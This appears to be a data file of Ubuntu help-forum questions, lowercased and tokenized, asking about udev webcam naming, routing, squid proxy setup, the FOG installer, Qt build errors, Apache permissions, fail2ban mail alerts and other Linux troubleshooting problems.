382402	tie via udev an external video webcam to /dev/video5 for apache server webcam streaming	my aim is to nail my logitech c270 to /dev/video5 and my old less capable internal cam to /dev/video0 via setting udev rules as follows in /etc/udev/init.d/26-video-persistent.rules/ **subsystem== '' video4linux '' , subsystems== '' usb '' , attrs { idvendor } == '' 0x5986 '' , attrs { device } == '' 0x0100 '' , name= '' video0 '' , symlink+= '' videoint '' subsystem== '' video4linux '' , subsystems== '' usb '' , attrs { idvendor } == '' 0x046d '' , attrs { device } == '' 0x0825 '' , name= '' video5 '' , symlink+= '' videoext '' ** i restarted these changed udev rules in /etc/udev/init.d/ via udevadm ... ( reloads udev rules and followed up with udevadm to trigger them ) , also i unloaded the driver uvcvideo via modprobe from the kernel and then reloaded it with modprobe -r uvcvideo & & modprobe uvcvideo however i still get this , david @ david-ubuntu : ~ $ ls /dev/vid* returns the following **/dev/video0 /dev/video1** the external logitech c270 is ( usually as here , but sometimes not ) defined to /dev/video1 instead of nailed to /dev/video5 as i want it . i can stream the camera to apache2 or vlc but the /dev/video allocation is never 100 % predictable . any ideas what is going wrong , anyone ?
382403	synaptic package manager removed ubuntu	i am a newbie to ubuntu . using it since a couple of months back and still learning it . but today something weird happened . i was trying to free some disk space from my /boot directory . to do that i have launched synaptic package manager and found initramfs package dependency update is broken and then i tried to remove this package and wanted to re install it . i selected that package and clicked on completely remove option thus all my ubuntu system went removed completely . nothing left ! ! ! except the grub loader and win7 in another partition of my hdd . i have some important documents and files inside ubuntu . so i am looking forward to if there any option if i can get back my system as it was before . i have searched google but found nothing that much helpful . can anyone please help ?
382405	canon i-sensys lbp7010c	i downloaded the linux drivers from canon 's support site and installed them . the installation was apparently easy under the ubuntu software-center ( 12.04 ) , but the printer does n't react at all to print jobs .
382407	vim autocomplpop issues ?	i need auto-completion in vim for programming languages , for that i downloaded the autocomplpop followed the instructions mentioned there and copied the files cp -r downloads/ns9tks-vim-l9-3bb534a720fa/plugin/* downloads/ns9tks-vim-l9-3bb534a720fa/doc/* downloads/ns9tks-vim-l9-3bb534a720fa/autoload/* to the vim directories /usr/share/vim/vim74/plugin/ /usr/share/vim/vim74/autoload/ /usr/share/vim/vim74/doc/ it gave the error about l9 : vim-script library , downloaded from here and did the same with these files copied its file to the vim respective directories when i copied the autoload directory content of the l9 library there was sub directory named l9 when it goes there in vim autoload directory it gave the permissions problem so i changed its permissions to chmod 644 , now it does n't give the l9 library error but when i edit a file vim hello.html it gives the errors when i press i to insert and keep giving the errors if i type anything . error detected while processing function < snr > 9_feedpopup.. < snr > 9_finishpopup : line 4 : e117 : unknown function : l9 # tempvariables # end press enter or type command to continue and surely auto-complete does n't work ! help !
382415	i ca n't see my desktop items on 13.10	i ca n't see my desktop items on 13.10 or any other application ! please help !
382420	ubuntu 13.10 and amd radeon 8240	i just bought a brand new pacakard bell pc and tried to install ubuntu ( efi ) on it . when installation finished and pc restarted , ubuntu can not launch lightdm . instead i have a prompt asking me if i wish to start in low graphic mode . but no effect if i click yes . screen stay black a while and i come back to terminal . i understood there are troubles with the free radeon driver . is there any issues ?
382421	remove last three characters from all files in a directory	i have a directory with about 10 files and i want to remove the last three characters from the names of all of these files . anyone know a terminal command that can do this ? and separately , how would i change the characters in the names of all these files to lowercase ?
382423	routing table definition for 2 nics	i cant figure this out . i 've tried asking this in superuser but the issue still persist . i hope someone could solve my issue . i 'm running ubuntu server in a vmsphere environment with 2 nic eth1 10.10.10.100/24 *and* eth0 10.167.95.25/26 currently my route table dest gw mask flags metric ref use iface 0.0.0.0 10.167.95.1 0.0.0.0 ug 100 0 0 eth0 10.167.95.0 0.0.0.0 255.255.255.192 u 0 0 0 eth0 nic 10.167.95.25 is reacheable . i want to add route for 10.10.10.0/24 , so i executed this command route add -net 10.10.10.0/24 dev eth1 routing table change as below : dest gw mask flags metric ref use iface 0.0.0.0 10.167.95.1 0.0.0.0 ug 100 0 0 eth0 10.10.10.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 10.167.95.0 0.0.0.0 255.255.255.192 u 0 0 0 eth0 i need to have successful ping for both interface . but whenever i add the route to 10.10.10.0/24 : 10.167.95.25 is not reacheable 10.10.10.100 is recheable unless i remove the route for 10.10.10.0/24 , 10.167.95.25/26 returns timeout .
382425	sound switches to headphones after random time	on my laptop ( ubuntu 12.04 lts ) arose out of the blue the following problem : after seemingly a random number of seconds the sound switches to the headphone jack and switches off the speakers . if i close the lid and wait for a few seconds , open it then there is speaker sound again for some seconds . same thing after rebooting . i have tried everything including fresh install of ubuntu , install , fresh install of the soundcard driver , alsamixer , pulsaudio and so on . now here comes the funny part : the same thing happens under window 8.1 ( i use a dual boot system ) . so logically it must be a hardware problem . in some way the soundcard must be broken . since i hardly can believe my own theory i am wondering if i am missing something here ?
382428	squid proxy and firewall blocking http requests	i have 3 virtual machines . one functions as a router . a http server is installed on another machine . the third has to connect to the server via the router . i have installed a web proxy ( squid3 ) on the router . the proxy has to serve only requests from the client machine as a transparent proxy . furthermore , the firewall on the router has to be configured to forward all traffic for port 80 ( http ) to the squid proxy port 3128 . the changes i made to the squid.conf file is : http_port 172.16.1.2:3128 transparent ( 172.16.1.2 is the ip of the client ) the rule i added to the firewall is : sudo iptables -a prerouting -t nat -i eth1 -p tcp -- dport 80 -j redirect -- to-port 3128 however , when i try to make a http request from the client machine , i get a 403 forbidden error . i ca n't understand where i have entered the wrong comment . how to solve this ?
382430	which app scans all disks searching any kind of media files ( photos , videos , etc . ) ?	is there an app which scans disks looking for all kinds of media files ( photos , videos , etc . ) the same way picasa does for pictures ? i could write a bash script to perform such thing , but i 'm not willing to think about all existent file extensions .
382431	toshiba external hdd only reading in usb 2.0	for some reason i plug in my external hdd and it only will read in my usb 2.0 port . it is 3.0 compatible i know because it used to work in my 3.0 ports on windows . at first i had thought it just was n't reading , because i could n't find it in fdisk or anywhere on my pc , but now i know it will only read in the 2.0 port . is there any specific reason for this ? and is there any fix for these ?
382432	i dont want to see any folder or application on desktop	i want to have folders present in desktop directory but it should not be actually displayed on the desktop . here i took a screen-shot of my desktop left side is what i see and right side is what i want to see
382433	ubuntu one client for opensuse	i recently switched from ubuntu to opensuse , however i would like to stay with ubuntuone cloud being the most cost effective for me . i ca n't seem to get the ubuntuone client working on opensuse - apparently needs to be rebuilt on opensuse but have n't been able to successfully yet . any advice on how to do this ?
382436	why wo n't ubuntu suspend while an xbox controller is plugged in ?	just a question that i had . i have an usb xbox controller that i 've had since 12.04 through 13.10 . i 've noticed that the computer wo n't suspend as long as its plugged in , in all versions . my workaround is to just unplug it then suspend my computer , but i 've always wondered , is there a reason for that ? thanks in advance .
382439	data of windows formatted during ubuntu how to recover ?	i am really in a big trouble i have lost my 352gbs of data during ubuntu installation . i mistakenly made a partition which caused to format my data which was already placed in that partition . the data i lost during ubuntu installation how can i recover it .
382442	installation problem of fog in ubuntu 13.04	.. # # # # # # # : . .. , # , .. . : : # # : : . . : # # # # # # . : ; # # # # : ... ... ; # ; .. ... # # ... ... # # ; , ; # # : : : :. # # ... , # ... # # ... .. # # : : : # # .. : : # # . : : # # # , , # # . . # # . : : # . : # # # # # # : : . ... # # : : : # # # : : ... . # . .. . # ... # . # ... # : : : . .. : # # # # : .. .. # # ... ... # # : : # # .. # # . ... # # : , ; # # ; : : : # : ... # # .. . # . . : ; # # # # ; : : : :. # # : : : ; # : .. # .. : ; # # # .. # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # fog # # free computer imaging solution # # # # created by : # # syperiorsoft # # http : //www.syperiorsoft.com # # developers : # # chuck syperski # # jian zhang # # # # gnu gpl version 3 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # version : 0.32 installer/updater what version of linux would you like to run the installtion for ? 1 ) redhat based linux ( fedora , centos ) 2 ) ubuntu based linux ( kubuntu , edubuntu ) choice : [ 2 ] 2 starting ubuntu installtion . fog server installation modes : * normal server : ( choice n ) this is the typical installation type and will install all fog components for you on this machine . pick this option if you are unsure what to pick . * storage node : ( choice s ) this install mode will only install the software required to make this server act as a node in a storage group more information : http : //www.fogproject.org/wiki/index.php ? title=installationmodes what type of installation would you like to do ? [ n ] what is the ip address to be used by this fog server ? [ 192.168.1.55 ] would you like to setup a router address for the dhcp server ? [ y/n ] what is the ip address to be used for the router on the dhcp server ? [ 192.168.1.1 ] would you like to setup a dns address for the dhcp server and client boot image ? [ y/n ] what is the ip address to be used for dns on the dhcp server and client boot image ? [ 127.0.1.1 ] would you like to change the default network interface from eth0 ? if you are not sure , select no . [ y/n ] would you like to use the fog server for dhcp service ? [ y/n ] this version of fog has internationalization support , would you like to install the additional language packs ? [ y/n ] n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # fog now has everything it needs to setup your server , but please understand that this script will overwrite any setting you may have setup for services like dhcp , apache , pxe , tftp , and nfs . it is not recommended that you install this on a production system as this script modifies many of your system settings . this script should be run by the root user on fedora , or with sudo on ubuntu . here are the settings fog will use : distro : ubuntu installation type : normal server server ip address : 192.168.1.55 dhcp router address : 192.168.1.1 dhcp dns address : 127.0.1.1 interface : eth0 using fog dhcp : 1 internationalization : 0 are you sure you wish to continue ( y/n ) y installation started ... installing required packages , if this fails make sure you have an active internet connection . * preparing apt-get * installing package : apache2 * installing package : php5 * installing package : php5-gd * installing package : php5-cli * installing package : php5-mysql * installing package : php5-curl * installing package : mysql-server we are about to install mysql server on this server , if mysql is n't installed already you will be prompted for a root password . if you do n't leave it blank you will need to change it in the config.php file located at : /var/www/fog/commons/config.php press enter to acknowledge this message . reading package lists ... building dependency tree ... reading state information ... mysql-server is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 39 not upgraded . * installing package : mysql-client * installing package : isc-dhcp-server * installing package : tftpd-hpa * installing package : tftp-hpa * installing package : nfs-kernel-server * installing package : vsftpd * installing package : net-tools * installing package : wget * installing package : xinetd * installing package : sysv-rc-conf * installing package : tar * installing package : gzip * installing package : build-essential * installing package : cpp * installing package : gcc * installing package : g++ * installing package : m4 * installing package : htmldoc * installing package : perl * installing package : libcrypt-passwdmd5-perl * installing package : lftp * installing package : openssh-server * installing package : php-gettext * installing package : clamav-freshclam confirming package installation . * checking package : apache2 ... ok * checking package : php5 ... ok * checking package : php5-gd ... ok * checking package : php5-cli ... ok * checking package : php5-mysql ... ok * checking package : php5-curl ... ok * checking package : mysql-server ... ok * checking package : mysql-client ... ok * checking package : isc-dhcp-server ... ok * checking package : tftpd-hpa ... ok * checking package : tftp-hpa ... ok * checking package : nfs-kernel-server ... ok * checking package : vsftpd ... ok * checking package : net-tools ... ok * checking package : wget ... ok * checking package : xinetd ... ok * checking package : sysv-rc-conf ... ok * checking package : tar ... ok * checking package : gzip ... ok * checking package : build-essential ... ok * checking package : cpp ... ok * checking package : gcc ... ok * checking package : g++ ... ok * checking package : m4 ... ok * checking package : htmldoc ... ok * checking package : perl ... ok * checking package : libcrypt-passwdmd5-perl ... ok * checking package : lftp ... failed ! ========================================================================================= after installing lftp now it shows following : - root @ frigate-desktop : /opt/fog_0.32/bin # ./installfog.sh .. # # # # # # # : . .. , # , .. . : : # # : : . . : # # # # # # . : ; # # # # : ... ... ; # ; .. ... # # ... ... # # ; , ; # # : : : :. # # ... , # ... # # ... .. # # : : : # # .. : : # # . : : # # # , , # # . . # # . : : # . : # # # # # # : : . ... # # : : : # # # : : ... . # . .. . # ... # . # ... # : : : . .. : # # # # : .. .. # # ... ... # # : : # # .. # # . ... # # : , ; # # ; : : : # : ... # # .. . # . . : ; # # # # ; : : : :. # # : : : ; # : .. # .. : ; # # # .. # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # fog # # free computer imaging solution # # # # created by : # # syperiorsoft # # http : //www.syperiorsoft.com # # developers : # # chuck syperski # # jian zhang # # # # gnu gpl version 3 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # version : 0.32 installer/updater what version of linux would you like to run the installtion for ? 1 ) redhat based linux ( fedora , centos ) 2 ) ubuntu based linux ( kubuntu , edubuntu ) choice : [ 2 ] starting ubuntu installtion . fog server installation modes : * normal server : ( choice n ) this is the typical installation type and will install all fog components for you on this machine . pick this option if you are unsure what to pick . * storage node : ( choice s ) this install mode will only install the software required to make this server act as a node in a storage group more information : http : //www.fogproject.org/wiki/index.php ? title=installationmodes what type of installation would you like to do ? [ n ] what is the ip address to be used by this fog server ? [ 192.168.1.55 ] would you like to setup a router address for the dhcp server ? [ y/n ] what is the ip address to be used for the router on the dhcp server ? [ 192.168.1.1 ] would you like to setup a dns address for the dhcp server and client boot image ? [ y/n ] what is the ip address to be used for dns on the dhcp server and client boot image ? [ 127.0.1.1 ] would you like to change the default network interface from eth0 ? if you are not sure , select no . [ y/n ] would you like to use the fog server for dhcp service ? [ y/n ] this version of fog has internationalization support , would you like to install the additional language packs ? [ y/n ] n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # fog now has everything it needs to setup your server , but please understand that this script will overwrite any setting you may have setup for services like dhcp , apache , pxe , tftp , and nfs . it is not recommended that you install this on a production system as this script modifies many of your system settings . this script should be run by the root user on fedora , or with sudo on ubuntu . here are the settings fog will use : distro : ubuntu installation type : normal server server ip address : 192.168.1.55 dhcp router address : 192.168.1.1 dhcp dns address : 127.0.1.1 interface : eth0 using fog dhcp : 1 internationalization : 0 are you sure you wish to continue ( y/n ) y installation started ... installing required packages , if this fails make sure you have an active internet connection . preparing apt-get installing package : apache2 installing package : php5 installing package : php5-gd installing package : php5-cli installing package : php5-mysql installing package : php5-curl installing package : mysql-server we are about to install mysql server on this server , if mysql is n't installed already you will be prompted for a root password . if you do n't leave it blank you will need to change it in the config.php file located at : /var/www/fog/commons/config.php press enter to acknowledge this message . e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? installing package : mysql-client installing package : isc-dhcp-server installing package : tftpd-hpa installing package : tftp-hpa installing package : nfs-kernel-server installing package : vsftpd installing package : net-tools installing package : wget installing package : xinetd installing package : sysv-rc-conf installing package : tar installing package : gzip installing package : build-essential installing package : cpp installing package : gcc installing package : g++ installing package : m4 installing package : htmldoc installing package : perl installing package : libcrypt-passwdmd5-perl installing package : lftp installing package : openssh-server installing package : php-gettext installing package : clamav-freshclam confirming package installation . checking package : apache2 ... ok checking package : php5 ... ok checking package : php5-gd ... ok checking package : php5-cli ... ok checking package : php5-mysql ... ok checking package : php5-curl ... ok checking package : mysql-server ... ok checking package : mysql-client ... ok checking package : isc-dhcp-server ... ok checking package : tftpd-hpa ... ok checking package : tftp-hpa ... ok checking package : nfs-kernel-server ... ok checking package : vsftpd ... ok checking package : net-tools ... ok checking package : wget ... ok checking package : xinetd ... ok checking package : sysv-rc-conf ... ok checking package : tar ... ok checking package : gzip ... ok checking package : build-essential ... ok checking package : cpp ... ok checking package : gcc ... ok checking package : g++ ... ok checking package : m4 ... ok checking package : htmldoc ... ok checking package : perl ... ok checking package : libcrypt-passwdmd5-perl ... ok checking package : lftp ... ok checking package : openssh-server ... ok checking package : php-gettext ... ok checking package : clamav-freshclam ... ok configuring services . setting up fog user ... exists setting up and starting mysql ... ok backing up user reports ... ok setting up and starting apache web server ... ok restoring user reports ... ok configuring fresh clam ... ok setting up storage ... ok setting up and starting nfs server ... ok setting up and starting dhcp server ... ok setting up and starting tftp and pxe serverscp : can not overwrite non-directory ‘/tftpboot/pxelinux.cfg’ with directory ‘../packages/tftp/pxelinux.cfg’ ... ok setting up and starting vsftp server ... ok setting up sudo settings ... ok setting up fog snapins ... ok setting up and building udpcast ... failed ! make failed !
382444	qt ( headers and libraries ) not found	i 'm trying to install a program and i used the following command : ./configure but , an error occurred : checking for qt ... configure : error : qt ( > = qt 3.2 ) ( headers and libraries ) not found . please check your installation ! config.log file : configure:28268 : checking for qt configure : 28333 : /usr/include/qt4/qstyle.h configure : 28333 : /usr/lib/qt3/include/qstyle.h configure : 28333 : /usr/lib/qt3/qstyle.h configure : 28333 : /usr/lib/qt/include/qstyle.h configure : 28333 : /usr/lib/qt/qstyle.h configure : 28333 : /usr/share/qt3/include/qstyle.h configure : 28333 : /usr/share/qt3/qstyle.h configure : 28333 : /usr/local/qt/include/qstyle.h configure : 28333 : /usr/include/qt/qstyle.h configure : 28333 : /usr/include/qstyle.h configure : 28333 : /usr/x11r6/include/x11/qt/qstyle.h configure : 28333 : /usr/x11r6/include/qt/qstyle.h configure : 28333 : /usr/x11r6/include/qt2/qstyle.h configure : 28333 : /usr/include/qt3/qstyle.h configure : 28333 : ./qstyle.h configure:28451 : rm -rf sunws_cache ; g++ -o conftest -wnon-virtual-dtor -wno-long-long -wundef -wall -w -wpointer-arith -wwrite-strings -ansi -d_xopen_source=500 -d_bsd_source -wcast-align -wconversion -wchar-subscripts -o2 -wformat-security -wmissing-format-attribute -fno-exceptions -fno-check-new -fno-common -ino -i . -dqt_thread_support -d_reentrant -l/usr/lib/qt3 -l/usr/lib conftest.cc -lqt-mt -ldl -lxext -lx11 -lsm -lice -lpthread 1 > & 5 conftest.cc:2:21 : fatal error : qglobal.h : no such file or directory # include < qglobal.h > ^ compilation terminated . configure:28454 : $ ? = 1 configure : failed program was : # include `` confdefs.h '' # include < qglobal.h > # include < qapplication.h > # include < qcursor.h > # include < qstylefactory.h > # include < private/qucomextra_p.h > # if ! ( qt_version > = 0x030200 ) # error 1 # endif int main ( ) { ( void ) qstylefactory : :create ( qstring : :null ) ; qcursor c ( qt : :whatsthiscursor ) ; return 0 ; } configure:28494 : error : qt ( > = qt 3.2 ) ( headers and libraries ) not found . please check your installation ! for more details about this problem , look at the end of config.log . i 've installed : sudo apt-get install libqt4-* sudo apt-get install qt5-default sudo apt-get install qtcreator however , i still got the same error . anyone can help me ? @ edit : maybe the problem is the path to qt files , because i found `` qstyle.h '' in the folder /usr/include/qt4/qt , for example .
382445	just deleted 100gb of files , no extra free space . how do i get it back without rebooting ?	there are other questions like this bumbling around the site ( that i 'm working through ) but i 'm in the strange position where i think i know what i 'm doing but ca n't explain what 's going on . i had 10x ~10gb files . none of them were open . previews in dolphin are turned off for files that big . confirmed with lsof . i selected the files and pressed shift+delete . this should skip the trash and nuke the files . no progress was recorded . usually dolphin/kde make a big fuss about deleting things . the files are `` gone '' ( not showing in dolphin or the command line ) i 'm still 100gb heavier than i should be . most importantly , i 'm at 100 % disk use , which is why this is an urgent issue . i 've checked .trash on that drive and they were n't in there . i 've checked lsof again . they 're not open . so it seems like the inodes were deleted but the space was n't freed . i would assume i have 100gb of orphan files . hooray . is there any way i can purge these orphan files from an active filesystem ( i realise a fsck would probably shift them off an offline filesystem ) ? i ca n't take the filesystem offline because important things ( system files , home items , etc ) are bind-mounted out of here . other details : the filesystem is ext3 ( i know , i should probably upgrade but changing fs is scaring when you 're dealing with 4tb of data ) . the device is a mdadm raid5 array .
382453	how to determine command location ?	i need to use keytool and i want to use possible newest version . i have on my ubuntu oracle jdk , and openjdk . ~ $ java -version java version `` 1.7.0_25 '' java ( tm ) se runtime environment ( build 1.7.0_25-b15 ) java hotspot ( tm ) 64-bit server vm ( build 23.25-b01 , mixed mode ) keytool command is located in two places : ~ $ type -a keytool keytool is /usr/bin/keytool keytool is /usr/local/java/jdk1.7.0_25/bin/keytool ~ $ file /usr/bin/keytool /usr/bin/keytool : symbolic link to /etc/alternatives/keytool ~ $ file /etc/alternatives/keytool /etc/alternatives/keytool : symbolic link to /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/keytool how do i know if i use /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/keytool or /usr/local/java/jdk1.7.0_25/bin/keytool ?
382459	how to get older version of opencv	this fails : sudo apt-get -t=2.3.1 install libopencv is there a way to figure put which command i have to type to get 2.3.1 running ? the default on ubuntu 13.04 is 2.4 thanks
382461	terminal command to know which gtk theme is in use	is there a terminal command to find out which gtk theme is being used and whether the theme is in ~/.themes or in /usr/share/themes ? on running gsettings get org.gnome.desktop.interface gtk-theme , i see greybird which is the default theme in xubuntu but i 'm not using that ; i 'm using another theme called numix which i 've modified and am running from ~/.themes after renaming it to mynumix . [ 08:41 pm ] ~ $ gsettings get org.gnome.desktop.interface gtk-theme 'greybird' [ 08:41 pm ] ~ $
382463	deauthenticated wifi intel centrino unltimate-n 6300 @ ubuntu 13.10 reason=3	[ yes , i saw other threads regarding intel 6300 , no solution ] hi , i have a big problem with my wifi intel centrino unltimate-n 6300 agn under ubuntu 13.10 . let me describe the problem . there i have two hp laptops ( different hw configs ) but with exacly the same wifi . my router/ap is cisco linksys e2500 . we switched to ubuntu 13.10 for both laptops from windows7 and windows8 respectivelly . it is imporant now to write that the wifi for both laptops works just fine in windows . we are able to connect ( n 2.4/5g , up to 300mbps ) to our ap and the connections remains solid and stable -- no issues at all . now i installed ubuntu 13.10 at both computers . the wifi device has been recognized and driver installed , cool . next we did configure the wireless connection using `` edit connection '' tool . so , i simply added connection name : home , ssid , wpa2 pass key , done . because our ap does not broadcast the ssid , from the wifi applet i run `` connect to hidden wireless '' and then select connection name : home -- and press `` connect '' . now the wifi applet starts `` blinking '' indicating establishing the connection.after few minutes a message appears `` can not connect to home '' . dmesg shows the connection has been associated , but then with `` reason=3 '' is has been deauthenticated , below . [ 340.723149 ] wlan0 : authenticated [ 340.723280 ] wlan0 : waiting for beacon from 20 : aa:4b:30:2b : dd [ 340.807334 ] wlan0 : associate with 20 : aa:4b:30:2b : dd ( try 1/3 ) [ 340.810827 ] wlan0 : rx assocresp from 20 : aa:4b:30:2b : dd ( capab=0x411 status=0 aid=2 ) [ 340.816194 ] wlan0 : associated [ 340.816297 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 389.514258 ] wlan0 : deauthenticating from 20 : aa:4b:30:2b : dd by local choice ( reason=3 ) [ 389.524810 ] cfg80211 : calling crda to update world regulatory domain [ 389.539764 ] cfg80211 : world regulatory domain updated : [ 389.539769 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 389.539771 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 389.539773 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 389.539775 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 389.539776 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 389.539778 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) the same problem exists at both computers . i did following tries with no success : downloaded and replaced most recent firmware from intel for 6300 ( btw , it is the same as in ubuntu13.10 distro ) . issued wifi options in various combinations : 11n_disable=1 , hwcrypto=0 , bt_coex_active=0 ; 2 . and just worth to note : both laptops under windows works just fine with my ap . third laptop ( asus ) with artheos wifi under ubuntu 13.10 connects to my ap with no issue . fourth laptop ( hp ) with intel centrino ultimate 5300 ( if i remember correctly ) under ubuntu 13.10 works perfectly as well with my ap . we got stuck . a help is appreciate regarding intel ultimate-n 6300 under ubuntu . it is expected more people has to have similar problems as intel 6300 wifi is pretty populer in hp products . did anyone face such problem ? any solution ? thx . andrew .
382464	permissions for an apache2 virtual host	i 'm usuing ubuntu 12.04lts and have created an apache virtual host in my local file system for a site i 'm developing . however , when apache tries to access the site , it ca n't because the ownerships are all in my own username and not www-data . so i changed all the ownerships : $ chown -r www-data : www-data domain-root-name apache is now happy , but i 'm not , because i can no longer do anything with the files - which i need to do for development purposes . i tried doing the reverse ( adding www-data to my own group ) , but that just meant that apache could no longer access the site . there 's lots of stuff about this all over the place but nothing works for me . mainly the suggestion is to add yourself to the www-data group . this is not sufficient , however , as i still ca n't edit the site 's files . the other suggestion is to set all permissions to 777 , which makes lots of respondents hold their hands up in horror , even though it ( obviously ) works . is there anyone out their who has solved this problem so that a developer can develop safely on a local apache installation ?
382467	ca n't install the propiertaries ati graphics driver	when i try to install my graphics driver it shows that- '' one or more tools requied for installation can not be found on the system . install the required tools before installing the fglrx driver . optionaly , run the installer without -- force to install the tools . forcing install will disable the amd hardaware acceleration and may make your syatem unstable . not recommended . see /usr/share/ati/fglrx-install.log for more details . '' i installed fglrx and tried again , but it did not work . and a system problem detected during installing the fglrx . it 's very important to install my graphics driver for my job ! the graphics driver also does not appear in the additional driver . what can i do ? ? /usr/share/ati/fglrx-install.log shows that check if system has the tools required for installation . fglrx installation requires that the system have kernel headers . /lib/modules/3.8.0-33-generic/build/include/linux/version.h can not be found on this system . one or more tools required for installation can not be found on the system . install the required tools before installing the fglrx driver . optionally , run the installer with -- force option to install without the tools . forcing install will disable amd hardware acceleration and may make your system unstable . not recommended .
382469	can not install network printer in ubuntu 13.10	i am running ubuntu 13.10 joined to active directory using centrify express . everything is working fine with the ad . however , i am trying to install a printer shared from a windows server ( joined to the ad ) . every attempt to install the shared printer it is installed as it was connected locally to the ubuntu computer . the steps i am performing are : go to the printers applet press the add printer button select network printer select find network printer type smb : //my_print_server/shared_printer_name the wizard prompts for the driver and i select the correct driver ( ricoh for our printers ) the wizard prompts for name and location and the printer is installed . it prompts for a test page and i press ok . however the printer never gets my print job and it never leaves the local queue . i can see in the printer properties that it mentions that it is connected to local host . what i am doing wrong ?
382471	boot loging problem , ubuntu with win 7	i 'm beginner in ubuntu , i 've just installed ubuntu on win 7 based on following link : https : //help.ubuntu.com/community/windowsdualboot . installation have been successfully completed . ( both win & ubuntu are installed on primary drives ) , but when i start computer there is no boot option and it directly goes to win7 . in provided document it mentioned something to change mbr in master boot record and boot manager part , but i did not get it . may anyone kindly advice me on this case please ? regards mahdi
382473	configuring fail2ban with ssmtp	how fail2ban and ssmtp should be configured so that i will get notification of banned ips in my mailbox ? i have installed ssmtp successfully and confirmed that it works from command line . however , i have had no success in configuring fail2ban to work with it . if i set the line mta = ssmtp to my jail.local the fail2ban does not start . if i try to follow the instructions from http : //youresuchageek.blogspot.fi/2012/11/howto-fail2ban-secure-your-network.html i 'll get the following error when testing `` quick send '' : $ echo `` testing '' | mail -s subject dest @ domain.com the program 'mail ' is currently not installed . you can install it by typing : sudo apt-get install mailutils if i install mailutils and test the same command from command line , nothing happens . i wo n't get an error but i do not receive mail either . this also means that setting the the line mta = mail to jail.local does not do anything ( note : i have set a line action = % ( action_mwl ) s so it is not an issue here ) . should i somehow make a symbolic link from mail to ssmtp and hope that it works ? or is this just a configuration issue which is fixed by editing some configuration file ? this is my first attempt to set up a working linux server , so could someone provide me step-by-step instructions for getting this to work ?
382474	ubuntu 12.04 no boot	i am trying to in install ubuntu as a clean install with no other os . whenever i choose my hdd it appears it is choosing to install the mbr to another hdd . i am going to unplug all other hdds , but wanted to check here for a different alternative . here is my info : http : //paste.ubuntu.com/6476962/
382478	how do you get the display to automatically shut off in ubuntu 13.10 ?	the display will not automatically turn off after 10 minutes , even though it is set to do so in the brightness & lock under system settings . running these commands in a terminal will cause the display to turn off as i desire , but only until the next reboot . xset +dpms xset dpms 600
382480	maas api internal server error 500 while commissioning node	i always get request to http : // $ maasserver/maas/metadata//2012-03-01/ failed , sleeping http error 500 : internal server error ( screenshot not posted , i lack the reputation . . . ; - ) ) now , when trying to commission any nodes . calling the url in the browser returns just a message about missing authentication headers . but that 's not a 500 . i have n't found any logs so far , where to check for this error on the server side . any ideas ? need more details ? thanks in advance , phil edit : maas.log while the calls are executed : error 2013-11-26 15:32:48,332 maasserver # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # exception : undefined namespace prefix # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # error 2013-11-26 15:32:48,332 maasserver traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/django/core/handlers/base.py '' , line 115 , in get_response response = callback ( request , *callback_args , **callback_kwargs ) file `` /usr/lib/python2.7/dist-packages/django/views/decorators/vary.py '' , line 19 , in inner_func response = func ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/piston/resource.py '' , line 167 , in call result = self.error_handler ( e , request , meth , em_format ) file `` /usr/lib/python2.7/dist-packages/piston/resource.py '' , line 165 , in call result = meth ( request , *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/maasserver/api_support.py '' , line 147 , in dispatch return function ( self , request , *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/metadataserver/api.py '' , line 247 , in signal self._store_commissioning_results ( node , request ) file `` /usr/lib/python2.7/dist-packages/metadataserver/api.py '' , line 207 , in _store_commissioning_results exit_status=script_result ) file `` /usr/lib/python2.7/dist-packages/metadataserver/models/commissioningscript.py '' , line 173 , in update_hardware_details has_tag = evaluator ( tag.definition ) file `` xpath.pxi '' , line 322 , in lxml.etree.xpathelementevaluator.call ( src/lxml/lxml.etree.c:132785 ) file `` xpath.pxi '' , line 242 , in lxml.etree._xpathevaluatorbase._handle_result ( src/lxml/lxml.etree.c:131890 ) file `` xpath.pxi '' , line 227 , in lxml.etree._xpathevaluatorbase._raise_eval_error ( src/lxml/lxml.etree.c:131718 ) xpathevalerror : undefined namespace prefix
382481	how to make a flash or html5 panorama	is there any open source tool for ubuntu that could make a flash/html5 panoramic ? i have made a few panoramas using hugin , and i would love to be able navigate them from a browser . pano2vr works nicely , however if there is an open source alternative i would love to use it . thank you for your time and answers .
